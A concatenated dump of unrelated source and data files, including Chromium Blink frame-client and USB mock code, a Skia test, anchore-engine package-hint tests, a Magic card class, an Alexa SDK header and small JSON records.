The provisional load was redirected via a HTTP 3xx response. virtual void didReceiveServerRedirectForProvisionalLoad(WebLocalFrame*) {} // The provisional load failed. The WebHistoryCommitType is the commit type // that would have been used had the load succeeded. virtual void didFailProvisionalLoad(WebLocalFrame*, const WebURLError&, WebHistoryCommitType) {} // The provisional datasource is now committed. The first part of the // response body has been received, and the encoding of the response // body is known. virtual void didCommitProvisionalLoad(WebLocalFrame*, const WebHistoryItem&, WebHistoryCommitType) {} // The frame's document has just been initialized. 
virtual void didCreateNewDocument(WebLocalFrame* frame) {} // The window object for the frame has been cleared of any extra // properties that may have been set by script from the previously // loaded document. virtual void didClearWindowObject(WebLocalFrame* frame) {} // The document element has been created. // This method may not invalidate the frame, nor execute JavaScript code. virtual void didCreateDocumentElement(WebLocalFrame*) {} // Like |didCreateDocumentElement|, except this method may run JavaScript // code (and possibly invalidate the frame). virtual void runScriptsAtDocumentElementAvailable(WebLocalFrame*) {} // The page title is available. virtual void didReceiveTitle(WebLocalFrame* frame, const WebString& title, WebTextDirection direction) {} // The icon for the page have changed. virtual void didChangeIcon(WebLocalFrame*, WebIconURL::Type) {} // The frame's document finished loading. // This method may not execute JavaScript code. virtual void didFinishDocumentLoad(WebLocalFrame*) {} // Like |didFinishDocumentLoad|, except this method may run JavaScript // code (and possibly invalidate the frame). virtual void runScriptsAtDocumentReady(WebLocalFrame*, bool documentIsEmpty) { } // The 'load' event was dispatched. virtual void didHandleOnloadEvents(WebLocalFrame*) {} // The frame's document or one of its subresources failed to load. The // WebHistoryCommitType is the commit type that would have been used had the // load succeeded. virtual void didFailLoad(WebLocalFrame*, const WebURLError&, WebHistoryCommitType) {} // The frame's document and all of its subresources succeeded to load. virtual void didFinishLoad(WebLocalFrame*) {} // The navigation resulted in no change to the documents within the page. // For example, the navigation may have just resulted in scrolling to a // named anchor or a PopState event may have been dispatched. 
virtual void didNavigateWithinPage(WebLocalFrame*, const WebHistoryItem&, WebHistoryCommitType, bool contentInitiated) {} // Called upon update to scroll position, document state, and other // non-navigational events related to the data held by WebHistoryItem. // WARNING: This method may be called very frequently. virtual void didUpdateCurrentHistoryItem() {} // The frame's manifest has changed. virtual void didChangeManifest() {} // The frame's theme color has changed. virtual void didChangeThemeColor() {} // Called to dispatch a load event for this frame in the FrameOwner of an // out-of-process parent frame. virtual void dispatchLoad() {} // Returns the effective connection type when the frame was fetched. virtual WebEffectiveConnectionType getEffectiveConnectionType() { return WebEffectiveConnectionType::TypeUnknown; } // Push API --------------------------------------------------- // Used to access the embedder for the Push API. virtual WebPushClient* pushClient() { return 0; } // Presentation API ---------------------------------------------------- // Used to access the embedder for the Presentation API. virtual WebPresentationClient* presentationClient() { return 0; } // InstalledApp API ---------------------------------------------------- // Used to access the embedder for the InstalledApp API. virtual WebInstalledAppClient* installedAppClient() { return nullptr; } // Editing ------------------------------------------------------------- // These methods allow the client to intercept and overrule editing // operations. virtual void didChangeSelection(bool isSelectionEmpty) {} // This method is called in response to handleInputEvent() when the // default action for the current keyboard event is not suppressed by the // page, to give the embedder a chance to handle the keyboard event // specially. // // Returns true if the keyboard event was handled by the embedder, // indicating that the default action should be suppressed. 
virtual bool handleCurrentKeyboardEvent() { return false; } // Dialogs ------------------------------------------------------------- // This method opens the color chooser and returns a new WebColorChooser // instance. If there is a WebColorChooser already from the last time this // was called, it ends the color chooser by calling endChooser, and replaces // it with the new one. The given list of suggestions can be used to show a // simple interface with a limited set of choices. virtual WebColorChooser* createColorChooser( WebColorChooserClient*, const WebColor&, const WebVector<WebColorSuggestion>&) { return 0; } // Displays a modal alert dialog containing the given message. Returns // once the user dismisses the dialog. virtual void runModalAlertDialog(const WebString& message) {} // Displays a modal confirmation dialog with the given message as // description and OK/Cancel choices. Returns true if the user selects // 'OK' or false otherwise. virtual bool runModalConfirmDialog(const WebString& message) { return false; } // Displays a modal input dialog with the given message as description // and OK/Cancel choices. The input field is pre-filled with // defaultValue. Returns true if the user selects 'OK' or false // otherwise. Upon returning true, actualValue contains the value of // the input field. virtual bool runModalPromptDialog(const WebString& message, const WebString& defaultValue, WebString* actualValue) { return false; } // Displays a modal confirmation dialog with OK/Cancel choices, where 'OK' // means that it is okay to proceed with closing the view. Returns true if // the user selects 'OK' or false otherwise. virtual bool runModalBeforeUnloadDialog(bool isReload) { return true; } // This method returns immediately after showing the dialog. When the // dialog is closed, it should call the WebFileChooserCompletion to // pass the results of the dialog. Returns false if // WebFileChooseCompletion will never be called. 
virtual bool runFileChooser(const blink::WebFileChooserParams& params, WebFileChooserCompletion* chooserCompletion) { return false; } // UI ------------------------------------------------------------------ // Shows a context menu with commands relevant to a specific element on // the given frame. Additional context data is supplied. virtual void showContextMenu(const WebContextMenuData&) {} // This method is called in response to WebView's saveImageAt(x, y). // A data url from <canvas> or <img> is passed to the method's argument. virtual void saveImageFromDataURL(const WebString&) {} // Low-level resource notifications ------------------------------------ // A request is about to be sent out, and the client may modify it. Request // is writable, and changes to the URL, for example, will change the request // made. virtual void willSendRequest(WebLocalFrame*, WebURLRequest&) {} // Response headers have been received. virtual void didReceiveResponse(const WebURLResponse&) {} // The specified request was satified from WebCore's memory cache. virtual void didLoadResourceFromMemoryCache(const WebURLRequest&, const WebURLResponse&) {} // This frame has displayed inactive content (such as an image) from an // insecure source. Inactive content cannot spread to other frames. virtual void didDisplayInsecureContent() {} // The indicated security origin has run active content (such as a // script) from an insecure source. Note that the insecure content can // spread to other frames in the same origin. virtual void didRunInsecureContent(const WebSecurityOrigin&, const WebURL& insecureURL) {} // A reflected XSS was encountered in the page and suppressed. virtual void didDetectXSS(const WebURL&, bool didBlockEntirePage) {} // A PingLoader was created, and a request dispatched to a URL. virtual void didDispatchPingLoader(const WebURL&) {} // This frame has displayed inactive content (such as an image) from // a connection with certificate errors. 
virtual void didDisplayContentWithCertificateErrors(const WebURL& url) {} // This frame has run active content (such as a script) from a // connection with certificate errors. virtual void didRunContentWithCertificateErrors(const WebURL& url) {} // A performance timing event (e.g. first paint) occurred virtual void didChangePerformanceTiming() {} // Blink exhibited a certain loading behavior that the browser process will // use for segregated histograms. virtual void didObserveLoadingBehavior(WebLoadingBehaviorFlag) {} // Script notifications ------------------------------------------------ // Notifies that a new script context has been created for this frame. // This is similar to didClearWindowObject but only called once per // frame context. virtual void didCreateScriptContext(WebLocalFrame*, v8::Local<v8::Context>, int worldId) {} // WebKit is about to release its reference to a v8 context for a frame. virtual void willReleaseScriptContext(WebLocalFrame*, v8::Local<v8::Context>, int worldId) {} // Geometry notifications ---------------------------------------------- // The main frame scrolled. virtual void didChangeScrollOffset(WebLocalFrame*) {} // If the frame is loading an HTML document, this will be called to // notify that the <body> will be attached soon. virtual void willInsertBody(WebLocalFrame*) {} // Find-in-page notifications ------------------------------------------ // Notifies how many matches have been found in this frame so far, for a // given identifier. |finalUpdate| specifies whether this is the last // update for this frame. virtual void reportFindInPageMatchCount(int identifier, int count, bool finalUpdate) {} // Notifies what tick-mark rect is currently selected. The given // identifier lets the client know which request this message belongs // to, so that it can choose to ignore the message if it has moved on // to other things. 
The selection rect is expected to have coordinates // relative to the top left corner of the web page area and represent // where on the screen the selection rect is currently located. virtual void reportFindInPageSelection(int identifier, int activeMatchOrdinal, const WebRect& selection) {} // Quota --------------------------------------------------------- // Requests a new quota size for the origin's storage. // |newQuotaInBytes| indicates how much storage space (in bytes) the // caller expects to need. // WebStorageQuotaCallbacks::didGrantStorageQuota will be called when // a new quota is granted. WebStorageQuotaCallbacks::didFail // is called with an error code otherwise. // Note that the requesting quota size may not always be granted and // a smaller amount of quota than requested might be returned. virtual void requestStorageQuota(WebStorageQuotaType, unsigned long long newQuotaInBytes, WebStorageQuotaCallbacks) {} // MediaStream ----------------------------------------------------- // A new WebRTCPeerConnectionHandler is created. virtual void willStartUsingPeerConnectionHandler( WebRTCPeerConnectionHandler*) {} virtual WebUserMediaClient* userMediaClient() { return 0; } // Encrypted Media ------------------------------------------------- virtual WebEncryptedMediaClient* encryptedMediaClient() { return 0; } // User agent ------------------------------------------------------ // Asks the embedder if a specific user agent should be used. Non-empty // strings indicate an override should be used. Otherwise, // Platform::current()->userAgent() will be called to provide one. virtual WebString userAgentOverride() { return WebString(); } // Do not track ---------------------------------------------------- // Asks the embedder what value the network stack will send for the DNT // header. An empty string indicates that no DNT header will be send. 
virtual WebString doNotTrackValue() { return WebString(); } // WebGL ------------------------------------------------------ // Asks the embedder whether WebGL is allowed for the WebFrame. This call is // placed here instead of WebContentSettingsClient because this class is // implemented in content/, and putting it here avoids adding more public // content/ APIs. virtual bool allowWebGL(bool defaultValue) { return defaultValue; } // Screen Orientation -------------------------------------------------- // Access the embedder API for (client-based) screen orientation client . virtual WebScreenOrientationClient* webScreenOrientationClient() { return 0; } // Accessibility ------------------------------------------------------- // Notifies embedder about an accessibility event. virtual void postAccessibilityEvent(const WebAXObject&, WebAXEvent) {} // Provides accessibility information about a find in page result. virtual void handleAccessibilityFindInPageResult( int identifier, int matchIndex, const WebAXObject& startObject, int startOffset, const WebAXObject& endObject, int endOffset) {} // ServiceWorker ------------------------------------------------------- // Whether the document associated with WebDataSource is controlled by the // ServiceWorker. virtual bool isControlledByServiceWorker(WebDataSource&) { return false; } // Returns an identifier of the service worker controlling the document // associated with the WebDataSource. virtual int64_t serviceWorkerID(WebDataSource&) { return -1; } // Fullscreen ---------------------------------------------------------- // Called to enter/exit fullscreen mode. // After calling enterFullscreen or exitFullscreen, // WebWidget::didEnterFullscreen or WebWidget::didExitFullscreen // respectively will be called once the fullscreen mode has changed. 
virtual void enterFullscreen() {} virtual void exitFullscreen() {} // Sudden termination -------------------------------------------------- // Called when elements preventing the sudden termination of the frame // become present or stop being present. |type| is the type of element // (BeforeUnload handler, Unload handler). enum SuddenTerminationDisablerType { BeforeUnloadHandler, UnloadHandler, }; virtual void suddenTerminationDisablerChanged(bool present, SuddenTerminationDisablerType) { } // Navigator Content Utils -------------------------------------------- // Registers a new URL handler for the given protocol. virtual void registerProtocolHandler(const WebString& scheme, const WebURL& url, const WebString& title) {} // Unregisters a given URL handler for the given protocol. virtual void unregisterProtocolHandler(const WebString& scheme, const WebURL& url) {} // Check if a given URL handler is registered for the given protocol. virtual WebCustomHandlersState isProtocolHandlerRegistered( const WebString& scheme, const WebURL& url) { return WebCustomHandlersNew; } // Audio Output Devices API -------------------------------------------- // Checks that the given audio sink exists and is authorized. The result is // provided via the callbacks. This method takes ownership of the callbacks // pointer. virtual void checkIfAudioSinkExistsAndIsAuthorized( const WebString& sinkId, const WebSecurityOrigin&, WebSetSinkIdCallbacks* callbacks) { if (callbacks) { callbacks->onError(WebSetSinkIdError::NotSupported); delete callbacks; } } // Mojo ---------------------------------------------------------------- virtual InterfaceProvider* interfaceProvider() { return nullptr; } virtual InterfaceRegistry* interfaceRegistry() { return nullptr; } // Visibility ---------------------------------------------------------- // Returns the current visibility of the WebFrame. 
virtual WebPageVisibilityState visibilityState() const { return WebPageVisibilityStateVisible; } // Overwrites the given URL to use an HTML5 embed if possible. // An empty URL is returned if the URL is not overriden. virtual WebURL overrideFlashEmbedWithHTML(const WebURL& url) { return WebURL(); } }; } // namespace blink #endif
9,599
7,482
/* * Copyright (c) 2020-2020, BLUETRUM Development Team * * SPDX-License-Identifier: Apache-2.0 */ #ifndef BMSIS_GCC_H__ #define BMSIS_GCC_H__ /* ignore some GCC warnings */ #if defined ( __GNUC__ ) #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wsign-conversion" #pragma GCC diagnostic ignored "-Wconversion" #pragma GCC diagnostic ignored "-Wunused-parameter" #endif #endif
142
303
{"id":1728,"line-1":"Texas","line-2":"United States","attribution":"©2014 DigitalGlobe, Texas Orthoimagery Program","url":"https://www.google.com/maps/@32.631906,-100.543960,19z/data=!3m1!1e3"}
74
5,964
/* * Copyright 2012 Google Inc. * * Use of this source code is governed by a BSD-style license that can be * found in the LICENSE file. */ #include "PathOpsTestCommon.h" #include "SkPathOpsCubic.h" #include "Test.h" static const SkDCubic hullTests[] = { {{{2.6250000819563866, 2.3750000223517418}, {2.833333432674408, 2.3333333432674408}, {3.1111112236976624, 2.3333333134651184}, {3.4074075222015381, 2.3333332538604736}}}, }; static const size_t hullTests_count = SK_ARRAY_COUNT(hullTests); DEF_TEST(PathOpsCubicHull, reporter) { for (size_t index = 0; index < hullTests_count; ++index) { const SkDCubic& cubic = hullTests[index]; char order[4]; cubic.convexHull(order); } }
297
1,484
<reponame>ballad86/anchore-engine import json def is_overwrite_msg_in_log(caplog, pkg, pkg_type): return f"{pkg} package already present under {pkg_type}" in caplog.text class TestHintsNPM: def test_npm_hints(self, hints_image, caplog): hints = { "packages": [ { "name": "safe-buffer", "location": "/usr/lib/node_modules/npm/node_modules/string_decoder/node_modules/safe-buffer/package.json", "license": "FREE-FOR-ALL", "version": "100", "type": "npm", }, { "name": "toure-awesome", "license": "Propietary", "version": "1.0rc", "type": "npm", }, { "name": "lodash", "location": "/node_modules/lodash/package.json", "version": "1.9.4", "license": "Not a real license", "type": "npm", }, ] } result = hints_image(hints, "npm") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.npms" ]["base"] # Package not already present in report so verify it matches hint path = "/usr/lib/node_modules/npm/node_modules/string_decoder/node_modules/safe-buffer/package.json" package = pkgs.get(path) assert package["name"] == "safe-buffer" assert package["lics"] == ["FREE-FOR-ALL"] assert package["versions"] == ["100"] assert package.get("sourcepkg") == "safe-buffer" # Package not already present in report so verify it matches hint package = pkgs.get("/virtual/npmpkg/toure-awesome-1.0rc") assert package["name"] == "toure-awesome" assert package["lics"] == ["Propietary"] assert package["versions"] == ["1.0rc"] # Package already in report so verify hint did not overwrite it package = pkgs.get("/node_modules/lodash/package.json") assert package["name"] == "lodash" assert package["lics"] != ["Not a real license"] assert package["versions"] != ["1.9.4"] assert ( is_overwrite_msg_in_log( caplog, "/node_modules/lodash/package.json", "pkgs.npm" ) is True ) class TestHintsRPM: def test_rpm_hints(self, hints_image, caplog): hints = { "packages": [ { "name": "zlib", "license": "test some other license", "version": "987654:1.2.11-16.el8_2", "type": "rpm", "origin": "CentOS", }, { 
"name": "fedora-gpg-keys", "version": "35-0.4", "arch": "noarch", "type": "rpm", "license": "test-license", }, ] } result = hints_image(hints, "rpm") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.allinfo" ]["base"] # Package already in report so verify hint did not overwrite it package = pkgs.get("zlib") assert package["type"] == "rpm" assert package["license"] != "test some other license" assert "987654:1.2.11" not in package["version"] assert is_overwrite_msg_in_log(caplog, "zlib", "pkgs.allinfo") is True # Package not already present in report so verify it matches hint package = pkgs.get("fedora-gpg-keys") assert package["type"] == "rpm" assert package["license"] == "test-license" assert package["version"] == "35" class TestHintsDPKG: def test_dpkg_hints(self, hints_image, caplog): hints = { "packages": [ { "name": "adduser", "version": "43", "license": "GPL", "type": "dpkg", }, { "name": "master-alex", "version": "0.0.1rc", "license": "LGPLv8", "type": "dpkg", }, ] } result = hints_image(hints, "stretch-slim") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.allinfo" ]["base"] # Package already in report so verify hint did not overwrite it package = pkgs.get("adduser") assert package["type"] == "dpkg" assert package["version"] != "43" assert package["license"] != "GPL" assert is_overwrite_msg_in_log(caplog, "adduser", "pkgs.allinfo") is True # Package not already present in report so verify it matches hint package = pkgs.get("master-alex") assert package["type"] == "dpkg" assert package["version"] == "0.0.1rc" assert package["license"] == "LGPLv8" class TestHintsJava: def test_java_hints(self, hints_image, caplog): hints = { "packages": [ { "name": "TwilioNotifier-test-override", "origin": "com.twilio.test-override", "location": "/TwilioNotifier.hpi", "type": "java", "version": "N/A", }, { "name": "developer-dan", "origin": "com.twilio.jenkins", "type": "java", "version": "193.28", }, ] } result = 
hints_image(hints, "java") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.java" ]["base"] # Package already in report so verify hint did not overwrite it packages = pkgs.get("/TwilioNotifier.hpi") assert packages["type"] == "java-hpi" assert packages["location"] == "/TwilioNotifier.hpi" assert packages["origin"] != "com.twilio.test-override" assert packages["name"] != "TwilioNotifier-test-override" assert ( is_overwrite_msg_in_log(caplog, "/TwilioNotifier.hpi", "pkgs.java") is True ) # Package already in report so verify hint did not overwrite it packages = pkgs.get("/virtual/javapkg/developer-dan-193.28.jar") assert packages["type"] == "java-jar" assert packages["origin"] == "com.twilio.jenkins" assert packages["implementation-version"] == "193.28" class TestHintsAPKG: def test_apkg_hints(self, hints_image, caplog): hints = { "packages": [ { "version": "2.2", "sourcepkg": "alpine-keys", "release": "r3", "origin": "<NAME> <<EMAIL>>", "arch": "x86_64", "license": "Apache", "size": "1000", "type": "APKG", "name": "alpine-keys", }, { "version": "5.2", "sourcepkg": "test-pkg", "release": "r1", "origin": "something", "arch": "x86_64", "license": "Apache", "size": "200", "type": "APKG", "name": "test-pkg", }, ] } result = hints_image(hints, "py38") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.allinfo" ]["base"] # Package already in report so verify hint did not overwrite it packages = pkgs.get("alpine-keys") assert packages["type"] == "APKG" assert packages["size"] != "1000" assert packages["license"] != "Apache" assert packages["release"] != "r3" assert is_overwrite_msg_in_log(caplog, "alpine-keys", "pkgs.allinfo") is True # Package not already present in report so verify it matches hint packages = pkgs.get("test-pkg") assert packages["type"] == "APKG" assert packages["size"] == "200" assert packages["license"] == "Apache" assert packages["release"] == "r1" class TestHintsPython: def test_python_hints(self, 
hints_image, caplog): hints = { "packages": [ { "name": "py", "version": "1.9.1", "type": "python", "location": "/usr/lib/python3.8/my-site-packages", }, { "name": "hints-spectacular", "version": "1.0.0alpha", "type": "python", }, { "name": "hintstest", "version": "3.2.1", "type": "python", "location": "/usr/lib/python3.8/my-site-packages", }, ] } result = hints_image(hints, "py38") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.python" ]["base"] # Package not already present in report so verify it matches hint packages = pkgs.get("/usr/lib/python3.8/my-site-packages") assert packages["type"] == "python" assert packages["version"] == "1.9.1" assert packages["location"] == "/usr/lib/python3.8/my-site-packages" # Package not already present in report so verify it matches hint packages = pkgs.get("/virtual/pypkg/site-packages") assert packages["type"] == "python" assert packages["name"] == "hints-spectacular" assert packages["version"] == "1.0.0alpha" # Package already in report so verify hint did not overwrite it packages = pkgs.get("/usr/lib/python3.8/my-site-packages") assert packages["type"] == "python" assert packages["name"] != "hintstest" assert packages["version"] != "3.2.1" assert ( is_overwrite_msg_in_log( caplog, "/usr/lib/python3.8/my-site-packages", "pkgs.python" ) is True ) class TestHintsGem: def test_gem_hints(self, hints_image, caplog): hints = { "packages": [ { "name": "uri", "licenses": ["GPL"], "version": "0.11.0", "origins": ["<NAME>"], "source": "https://example.com", "type": "gem", "location": "/usr/lib/ruby/gems/2.7.0/specifications/default/uri-0.10.0.gemspec", }, { "name": "diamonds", "version": "2.0", "type": "gem", }, { "name": "test-override", "licenses": ["license-override"], "version": "3.2.0", "origins": ["Zane"], "source": "https://example.com/test-override", "type": "gem", "location": "/usr/lib/ruby/gems/2.7.0/specifications/bundler-2.1.4.gemspec", }, ] } result = hints_image(hints, "lean") pkgs = 
result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.gems" ]["base"] path = "/usr/lib/ruby/gems/2.7.0/specifications/default/uri-0.10.0.gemspec" packages = pkgs.get(path) # Package not already present in report so verify it matches hint assert packages["lics"] == ["GPL"] assert packages["versions"] == ["0.11.0"] assert packages["sourcepkg"] == "https://example.com" assert packages["type"] == "gem" # Package not already present in report so verify it matches hint packages = pkgs.get("/virtual/gempkg/diamonds-2.0") assert packages["type"] == "gem" assert packages["versions"] == ["2.0"] # Package already in report so verify hint did not overwrite it packages = pkgs.get( "/usr/lib/ruby/gems/2.7.0/specifications/bundler-2.1.4.gemspec" ) assert packages["lics"] != ["license-override"] assert packages["versions"] != ["3.2.0"] assert packages["sourcepkg"] != "https://example.com/test-override" assert ( is_overwrite_msg_in_log( caplog, "/usr/lib/ruby/gems/2.7.0/specifications/bundler-2.1.4.gemspec", "pkgs.gems", ) is True ) class TestHintsGo: def test_go_hints(self, hints_image, analyzed_data): hints = { "packages": [ { "name": "kind", "version": "v0.10.0", "type": "go", "license": "Apache2.0", }, ] } result = hints_image(hints, "lean") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.go" ]["base"] package = json.loads(pkgs.get("/virtual/gopkg/kind-v0.10.0")) # Package not already present in report so verify it matches hint assert package["name"] == "kind" assert package["license"] == "Apache2.0" assert package["version"] == "v0.10.0"
7,401
1,444
<gh_stars>1000+ package mage.cards.m; import java.util.UUID; import mage.MageInt; import mage.ObjectColor; import mage.abilities.common.CantBeCounteredSourceAbility; import mage.abilities.common.EntersBattlefieldAbility; import mage.abilities.effects.common.EntersBattlefieldWithXCountersEffect; import mage.abilities.keyword.HasteAbility; import mage.abilities.keyword.ProtectionAbility; import mage.cards.CardImpl; import mage.cards.CardSetInfo; import mage.constants.CardType; import mage.constants.SubType; import mage.counters.CounterType; /** * * @author LevelX2 */ public final class MistcutterHydra extends CardImpl { public MistcutterHydra(UUID ownerId, CardSetInfo setInfo) { super(ownerId,setInfo,new CardType[]{CardType.CREATURE},"{X}{G}"); this.subtype.add(SubType.HYDRA); this.power = new MageInt(0); this.toughness = new MageInt(0); // Mistcutter Hydra can't be countered. this.addAbility(new CantBeCounteredSourceAbility()); // Haste this.addAbility(HasteAbility.getInstance()); // protection from blue this.addAbility(ProtectionAbility.from(ObjectColor.BLUE)); // Mistcutter Hydra enters the battlefield with X +1/+1 counters on it. this.addAbility(new EntersBattlefieldAbility(new EntersBattlefieldWithXCountersEffect(CounterType.P1P1.createInstance()))); } private MistcutterHydra(final MistcutterHydra card) { super(card); } @Override public MistcutterHydra copy() { return new MistcutterHydra(this); } }
572
348
<reponame>chamberone/Leaflet.PixiOverlay<gh_stars>100-1000 {"nom":"Ambres","circ":"3ème circonscription","dpt":"Tarn","inscrits":816,"abs":384,"votants":432,"blancs":35,"nuls":8,"exp":389,"res":[{"nuance":"LR","nom":"<NAME>","voix":227},{"nuance":"REM","nom":"<NAME>","voix":162}]}
115
1,272
/* * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). * You may not use this file except in compliance with the License. * A copy of the License is located at * * http://aws.amazon.com/apache2.0/ * * or in the "license" file accompanying this file. This file is distributed * on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either * express or implied. See the License for the specific language governing * permissions and limitations under the License. */ #ifndef ALEXA_CLIENT_SDK_CAPABILITYAGENTS_PLAYBACKCONTROLLER_INCLUDE_PLAYBACKCONTROLLER_PLAYBACKCONTROLLER_H_ #define ALEXA_CLIENT_SDK_CAPABILITYAGENTS_PLAYBACKCONTROLLER_INCLUDE_PLAYBACKCONTROLLER_PLAYBACKCONTROLLER_H_ #include <memory> #include <queue> #include <string> #include <acsdkManufactory/Annotated.h> #include <acsdkShutdownManagerInterfaces/ShutdownNotifierInterface.h> #include <AVSCommon/AVS/CapabilityConfiguration.h> #include <AVSCommon/AVS/MessageRequest.h> #include <AVSCommon/SDKInterfaces/CapabilityConfigurationInterface.h> #include <AVSCommon/SDKInterfaces/ContextManagerInterface.h> #include <AVSCommon/SDKInterfaces/ContextRequesterInterface.h> #include <AVSCommon/SDKInterfaces/MessageSenderInterface.h> #include <AVSCommon/SDKInterfaces/PlaybackHandlerInterface.h> #include <AVSCommon/SDKInterfaces/Endpoints/DefaultEndpointAnnotation.h> #include <AVSCommon/SDKInterfaces/Endpoints/EndpointCapabilitiesRegistrarInterface.h> #include <AVSCommon/Utils/RequiresShutdown.h> #include <AVSCommon/Utils/Threading/Executor.h> #include "PlaybackCommand.h" namespace alexaClientSDK { namespace capabilityAgents { namespace playbackController { class PlaybackController : public avsCommon::sdkInterfaces::ContextRequesterInterface , public avsCommon::sdkInterfaces::PlaybackHandlerInterface , public avsCommon::sdkInterfaces::CapabilityConfigurationInterface , public avsCommon::utils::RequiresShutdown , public 
std::enable_shared_from_this<PlaybackController> { public: /** * Factory method to create an instance of @c PlaybackHandlerInterface. * * @param contextManager The @c ContextManagerInterface used to generate system context for events. * @param messageSender The @c MessageSenderInterface that sends events to AVS. * @return @c nullptr if the inputs are not defined, else a new instance of @c PlaybackController. */ static std::shared_ptr<PlaybackHandlerInterface> createPlaybackHandlerInterface( std::shared_ptr<avsCommon::sdkInterfaces::ContextManagerInterface> contextManager, std::shared_ptr<avsCommon::sdkInterfaces::MessageSenderInterface> messageSender, std::shared_ptr<acsdkShutdownManagerInterfaces::ShutdownNotifierInterface> shutdownNotifier, acsdkManufactory::Annotated< avsCommon::sdkInterfaces::endpoints::DefaultEndpointAnnotation, avsCommon::sdkInterfaces::endpoints::EndpointCapabilitiesRegistrarInterface> defaultEndpointCapabilitiesRegistrar); /** * Create an instance of @c PlaybackController. * * @param contextManager The @c ContextManagerInterface used to generate system context for events. * @param messageSender The @c MessageSenderInterface that sends events to AVS. * @return @c nullptr if the inputs are not defined, else a new instance of @c PlaybackController. */ static std::shared_ptr<PlaybackController> create( std::shared_ptr<avsCommon::sdkInterfaces::ContextManagerInterface> contextManager, std::shared_ptr<avsCommon::sdkInterfaces::MessageSenderInterface> messageSender); /** * Destructor. 
*/ virtual ~PlaybackController() = default; /// @name ContextRequesterInterface Functions /// @{ void onContextAvailable(const std::string& jsonContext) override; void onContextFailure(const avsCommon::sdkInterfaces::ContextRequestError error) override; /// @} /// @name PlaybackControllerInterface Functions /// @{ void onButtonPressed(avsCommon::avs::PlaybackButton button) override; void onTogglePressed(avsCommon::avs::PlaybackToggle toggle, bool action) override; /// @} /// @name CapabilityConfigurationInterface Functions /// @{ std::unordered_set<std::shared_ptr<avsCommon::avs::CapabilityConfiguration>> getCapabilityConfigurations() override; /// @} /** * Manage completion of event being sent. * * @param PlaybackCommand The @PlaybackButton or @PlaybackToggle that was pressed to generate the message sent. * @param messageStatus The status of submitted @c MessageRequest. */ void messageSent( const PlaybackCommand&, avsCommon::sdkInterfaces::MessageRequestObserverInterface::Status messageStatus); private: /** * Constructor. * * @param contextManager The AVS Context manager used to generate system context for events. * @param messageSender The message sender interface that sends events to AVS. */ PlaybackController( std::shared_ptr<avsCommon::sdkInterfaces::ContextManagerInterface> contextManager, std::shared_ptr<avsCommon::sdkInterfaces::MessageSenderInterface> messageSender); // @name RequiresShutdown Functions /// @{ void doShutdown() override; /// @} /** * Process the @c PlaybackCommand for the pressed button. * * @param The @c PlaybackCommand associated with the button pressed. */ void handleCommand(const PlaybackCommand& command); /** * @name Executor Thread Variables * * These member variables are only accessed by functions in the @c m_executor worker thread, and do not require any * synchronization. */ /// @{ /// The @c MessageSenderInterface used to send event messages. 
std::shared_ptr<avsCommon::sdkInterfaces::MessageSenderInterface> m_messageSender; /// The @c ContextManager used to generate system context for events. std::shared_ptr<avsCommon::sdkInterfaces::ContextManagerInterface> m_contextManager; /// The queue for storing the commands. std::queue<const PlaybackCommand*> m_commands; /// @} /// Set of capability configurations that will get published using the Capabilities API std::unordered_set<std::shared_ptr<avsCommon::avs::CapabilityConfiguration>> m_capabilityConfigurations; /// The @c Executor which queues up operations from asynchronous API calls to the @c PlaybackControllerInterface. avsCommon::utils::threading::Executor m_executor; }; } // namespace playbackController } // namespace capabilityAgents } // namespace alexaClientSDK #endif // ALEXA_CLIENT_SDK_CAPABILITYAGENTS_PLAYBACKCONTROLLER_INCLUDE_PLAYBACKCONTROLLER_PLAYBACKCONTROLLER_H_
2,238
14,668
<reponame>zealoussnow/chromium<gh_stars>1000+ // Copyright 2015 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "services/device/usb/mock_usb_device.h" #include <utility> #include "base/strings/utf_string_conversions.h" namespace device { MockUsbDevice::MockUsbDevice(uint16_t vendor_id, uint16_t product_id) : MockUsbDevice(vendor_id, product_id, "", "", "") {} MockUsbDevice::MockUsbDevice(uint16_t vendor_id, uint16_t product_id, const std::string& manufacturer_string, const std::string& product_string, const std::string& serial_number) : UsbDevice(0x0200, // usb_version 0xff, // device_class 0xff, // device_subclass 0xff, // device_protocol vendor_id, product_id, 0x0100, // device_version base::UTF8ToUTF16(manufacturer_string), base::UTF8ToUTF16(product_string), base::UTF8ToUTF16(serial_number), /*bus_number=*/0, /*port_number=*/0) {} MockUsbDevice::~MockUsbDevice() = default; void MockUsbDevice::AddMockConfig(mojom::UsbConfigurationInfoPtr config) { device_info_->configurations.push_back(std::move(config)); } void MockUsbDevice::ActiveConfigurationChanged(int configuration_value) { UsbDevice::ActiveConfigurationChanged(configuration_value); } void MockUsbDevice::NotifyDeviceRemoved() { UsbDevice::NotifyDeviceRemoved(); } } // namespace device
773
471
